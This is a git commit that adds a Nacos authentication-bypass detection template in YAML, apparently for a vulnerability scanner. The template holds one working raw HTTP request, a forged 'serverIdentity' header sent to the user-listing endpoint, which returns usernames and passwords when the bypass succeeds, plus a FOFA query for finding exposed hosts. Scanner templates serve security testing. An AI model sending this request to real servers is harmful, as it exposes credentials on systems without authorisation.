Create nacos-auth-bypass.yaml

2023-08-22 12:43:43 +05:30 · 2023-08-22 12:43:43 +05:30 · ceca12f8ba
parent 8774194d0b
commit ceca12f8ba
1 changed files with 42 additions and 0 deletions
--- a/http/vulnerabilities/other/nacos-auth-bypass.yaml
+++ b/http/vulnerabilities/other/nacos-auth-bypass.yaml
@ -0,0 +1,42 @@
+id: nacos-auth-bypass
+
+info:
+  name: Nacos - Authentication Bypass
+  author: SleepingBag945
+  severity: high
+  description: |
+    When analyzing the authentication verification process of Nacos, it is found that there are various default authentication methods. By default, various methods can be used to bypass authorization authentication.
+  reference:
+    - https://zhuanlan.zhihu.com/p/602021283
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: app="NACOS"
+  tags: nacos,auth-bypass
+
+http:
+  - raw:
+      - |
+        GET /v1/auth/users?pageNo=1&pageSize=9&search=blur HTTP/1.1
+        Host: {{Hostname}}
+        serverIdentity: security
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"totalCount":'
+          - '"username":'
+          - '"password":'
+          - '"pagesAvailable":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - application/json
+
+      - type: status
+        status:
+          - 200